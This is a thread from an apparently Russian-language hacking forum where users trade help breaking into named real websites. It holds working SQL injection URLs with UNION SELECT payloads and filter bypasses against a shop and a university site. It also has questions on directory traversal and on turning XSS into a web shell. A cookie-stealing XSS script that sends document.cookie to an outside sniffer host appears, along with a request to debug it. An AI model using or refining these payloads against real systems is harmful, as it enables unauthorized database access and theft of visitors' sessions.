Ваши вопросы по уязвимостям.

я с подобным раньше не сталкивался:

http://web.atto.ru/catalog_new/catalog.php?act=tovar&CODE=211259

если подставить кавычку, то эрроры будут и от mssql и от mysql, как это ?
и возможно ли из этого что-то извлечь полезное (имя БД, юзера, версию, а то как ни пробовал, не получается) ?

 

а mssql и mysql одновременно, это как ?

 

А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.

 

Спасибо =)

 

Уважаемые форучане, нужна ваша помощь в данной иньекции..по мне так стоит фильтр на лимит и на скобки.... подсобите пожайлуста..
http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/%23&idcat=1

 

http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,1/**/%23&idcat=1

не понял трабла (хотя со скобками да, заморочка какая-то)

PS: СНГ )

 

Pashkela извини.. что то я тормознул...большое спасибо

 

А можно ли вставить подзапрос модификации в инъекцию select?
Привелегий на запись файлов нет, привелегий на чтение файлов нет...
Хотелось бы выполнить insert или update..

База MySQL, 5.0.70

 

http://mgta.ru/struct/faculty/psychology/030301%27%20union%20select%201%20--%20/ и так далее.

 

Разделение через точку запятой это для MsSQL, mysql из php так не может, да и из остальных помоему тоже. Хотелось бы что нибудь типа on duplicate key, только для selecta. Интересно, нет никакого on error?

 

Ну вообще есть такие запросы, но при непосредственной работе с базой.
Насколько я знаю из php такое нельзя выполнить.

 

Да, действительно. Но нам это к сожалению врядли поможет

 

Как поднятся на уровень директории выше, если скрипт обрезает ".."?

 

сомневаюсь в возможности

 

Обрезается только ".." или "." тоже?

 

Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется

Немного помудрив смог выполнить на нем хтмл код

т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?

 

Если зальешь шелл через XSS - выложи видео, лол ок.
*не надо мне тут говорить пров аши особые условия
Только куки

*скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.

 

дай ссылку плиз на это чудо

 

<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз

 

С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\